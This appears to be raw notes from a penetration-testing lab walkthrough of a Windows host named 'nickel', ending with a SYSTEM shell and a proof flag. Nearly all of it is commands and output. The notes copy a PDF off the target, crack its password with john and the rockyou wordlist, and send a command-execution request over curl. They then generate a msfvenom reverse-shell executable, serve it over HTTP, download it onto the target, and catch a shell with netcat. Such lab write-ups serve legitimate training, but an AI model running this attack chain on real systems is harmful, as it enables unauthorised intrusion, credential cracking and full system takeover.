Priv Esc
NowiseSloopTheory139
PS C:\Users\ariah> ls C:\
Directory: C:\
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         9/1/2020  12:38 PM                ftp
d-----         9/1/2020  12:04 PM                PerfLogs
d-r---        4/14/2022   5:22 AM                Program Files
d-r---        4/14/2022   4:43 AM                Program Files (x86)
d-r---         9/1/2020  12:38 PM                Users
d-----        4/14/2022   5:23 AM                Windows
-a----        8/28/2024   5:40 PM           2693 output.txt
PS C:\Users\ariah> ls C:\ftp\
Directory: C:\ftp
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/1/2020  11:02 AM          46235 Infrastructure.pdf
PS C:\Users\ariah> copy C:\ftp\Infrastructure.pdf .
$ scp ariah@192.168.241.99:Infrastructure.pdf .
$ pdf2john Infrastructure.pdf > pdf.hash
$ john pdf.hash --wordlist=~/rockyou.txt
ariah4168
$ curl http://192.168.241.99/?whoami
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1337 -f exe -o shell.exe
$ python -m http.server 80
$ nc -lnvp 1337
ariah@NICKEL C:\ProgramData>curl 192.168.45.233/shell.exe -o shell.exe
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.241.99] 49766
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nickel
nt authority\system
9614154844e05f926e2f501e88fcc495
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.241.99
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.241.254
C:\Windows\system32>